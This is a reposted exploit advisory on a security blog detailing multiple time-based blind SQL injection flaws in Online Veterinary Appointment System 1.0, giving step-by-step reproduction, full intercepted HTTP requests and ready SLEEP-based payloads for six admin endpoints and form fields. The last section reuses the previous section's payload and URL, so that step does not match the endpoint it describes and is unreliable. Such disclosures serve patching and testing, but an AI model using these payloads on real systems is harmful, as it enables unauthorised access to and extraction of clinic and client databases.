Friday, April 19, 2024

Online Veterinary Appointment System 1.0 – ‘Multiple’ SQL Injection

User Avatar
By Steven Black (n0tst3)
EXPLOIT
EXPLOIT
# Exploit Title: Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection

# Exploit Author: twseptian
# Vendor Homepage: https://www.sourc ecodester.com/php/15119/online-veterinary-appointment-system-using-phpoop-free-source-code.html
# Software Link: https://www.sourc ecodester.com/sites/default/files/download/oretnom23/ovas.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4

=====================================================================================================================================
SQL Injection:
=====================================================================================================================================
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Online Veterinary Appointment System 1.0 is vulnerable to 'Multiple' SQL injections.

=====================================================================================================================================
Attack Vector:
=====================================================================================================================================
An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.

=====================================================================================================================================
1. Appointment Requests - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Appointment Requests' page using the following URL:

http://localhost/ovas/admin/?page=appointments

then go to 'Action' > 'View'.

Step-2: Put the SQL Injection payloads in 'id' field.
time-based blind payload : page=appointments/view_details&id=1' AND (SELECT 2197 FROM (SELECT(SLEEP(5)))DZwi) AND 'mQQq'='mQQq

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
2. Inquiries - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Inquiries' page using the following URL:

http://localhost/ovas/admin/?page=inquiries

then go to 'Action' > 'View'.

Step-2: Let's intercept 'View' request using burpsuite: 

GET /ovas/admin/inquiries/view_details.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/ovas/admin/?page=inquiries
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/inquiries/view_details.php?id=1' AND (SELECT 6051 FROM (SELECT(SLEEP(5)))DEds) AND 'SOxP'='SOxP

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
3. My Account - Vulnerable Parameter(s): id,firstname,lastname,username
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'My Account' page using the following URL:

http://localhost/ovas/admin/?page=user

Step-2: then let's intercept 'Update' request using burpsuite: 

POST /ovas/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------24959341351495697487735843118
Content-Length: 796
Origin: http://localhost
Connection: close
Referer: http://localhost/ovas/admin/?page=user
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="id"

4
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="firstname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="lastname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="username"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="password"


-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------24959341351495697487735843118--

Put the SQL Injection payloads in Vulnerable Parameter(s): id,firstname,lastname,username
for example, the time-based blind payload in 'id':  

[SNIP]
Content-Disposition: form-data; name="id"

4 AND (SELECT 9713 FROM (SELECT(SLEEP(5)))YIam)
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="firstname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="lastname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="username"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="password"


-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------24959341351495697487735843118--

Step-3: If we use BurpSuite, click 'Send'. The server target accepted our payload, and the response got delayed by 5 seconds. The same thing for other parameters

=====================================================================================================================================
4. Category List - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Category List ' page using the following URL:

http://localhost/ovas/admin/?page=categories

then go to 'Action' > 'Edit' 

Step-2: Let's intercept 'Edit' request using burpsuite: 

GET /ovas/admin/categories/manage_category.php?id=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/ovas/admin/?page=categories
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/categories/manage_category.php?id=2' AND (SELECT 3851 FROM (SELECT(SLEEP(5)))UFXk) AND 'XbFb'='XbFb

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
5. Service List - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Service List ' page using the following URL:

http://localhost/ovas/admin/?page=services

then go to 'Action' > 'View' 

Step-2: Let's intercept 'View' request using burpsuite: 

GET /ovas/admin/services/view_service.php?id=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/ovas/admin/?page=services
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

=====================================================================================================================================
6. Admin User List - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps of reproduce:
Step-1: On the dashboard navigate to 'Admin User List ' page using the following URL:

http://localhost/ovas/admin/?page=user/list

then go to 'Action' > 'Edit' 

Step-2: Let's intercept 'Edit' request using burpsuite: 

GET /ovas/admin/?page=user/manage_user&id=3 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/ovas/admin/?page=user/list
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ

Step-3: Now, the Server target accepted our payload and the response got delayed by 5 seconds.

You may also enjoy reading, ElementVape: Major e-cigarette store hacked to steal credit cards

Recommended:  Apache Struts 2.5.20 - Double OGNL evaluation POC

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
ClosePlease login
Share the word, let's increase Cybersecurity Awareness as we know it
- Sponsored -

Sponsored Offer

Unleash the Power of the Cloud: Grab $200 Credit for 60 Days on DigitalOcean!

Get Offer
Digital ocean free 200

Discover more infosec

User Avatar
Steven Black (n0tst3)
Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK. I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated... I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK. I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!

more infosec reads

Subscribe for weekly updates

explore

more

security

Editor Picks

Featured

Cyber Academy

ABOUT US

RiSec represents an autonomous, non-profit alliance comprising of individuals dedicated to enhancing cybersecurity awareness and education. Read more

Contact us: security@realinfosec.net

Social

Subscribe for weekly updates

Copyright © RiSec 2023 All rights reserved.
All trademarks, logos, images and brand names are the property of their respective owners.